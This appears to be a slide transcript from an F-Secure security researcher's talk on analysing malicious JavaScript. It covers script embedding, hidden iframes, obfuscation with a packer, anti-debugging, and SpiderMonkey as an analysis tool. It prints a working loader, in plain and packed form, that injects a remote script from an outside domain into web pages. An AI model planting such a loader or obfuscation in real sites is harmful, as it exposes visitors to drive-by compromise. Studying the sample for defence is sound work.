Transcript Karmina Aquino F-Secure Corporation

Karmina Aquino
F-Secure Corporation
*&%*!
vbscript
javascript
!
1
Cross-browser
compatibility
2
Default HTML script
language
3
AJAX
4
Supported by
several applications
<script type='text/javascript'>
or
<script>
<!-***Javascript code***
-->
</script>
<script type='text/javascript' src='test.js'></script>
<iframe src ='test.js' width=0 height=0></iframe>
document.write()
eval()
location.reload()
location.replace()
location.href()
onLoad()
onUnload()
onSubmit()
loadScript_YOU();
function loadScript_YOU() {
if ('https:' == document.location.protocol) return false;
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://enchulafb.info/script.js");
var head=document.getElementsByTagName("head")[0];
if( head==null) return false;
head.appendChild(s);
return true;
}
Readable
deciperable
eval(function(p,a,c,k,e,r){e=function(c){return
c.toString(a)};if(!''.replace(/^/,String)){while(c-)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c-)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3();9
3(){4(\'b:\'==1.c.d)2 5;6
s=1.e(\'7\');s.8("f","g/h");s.8("i","j://k.l/7.m");6
a=1.n("o")[0];4(a==p)2 5;a.q(s);2
r}',29,29,'|document|return|loadScript_YOU|if|false|var|script|se
tAttribute|function||https|location|protocol|createElement|type|t
ext|javascript|src|http|enchulafb|info|js|getElementsByTagName|he
ad|null|appendChild|true|'.split('|'),0,{}))
Readable
deciperable
own obfuscation technique
Dean Edwards /packer/
eval(function(p,a,c,k,e,d)…
anti-debugging
arguments.callee.toString()
location.href
document.cookie
SpiderMonkey
• Test environment for Javascript engine
• Maintained by Mozilla
• Used for Static Analysis
Microsoft IE Developer Tools
• Tool for debugging scripts
• Developed by Microsoft
SPIDERMONKEY
js.exe –f wrapper.js –f malware.js
https://developer.mozilla.org/En/SpiderMonkey/Introduction_to_the_JavaScript_shell
Demo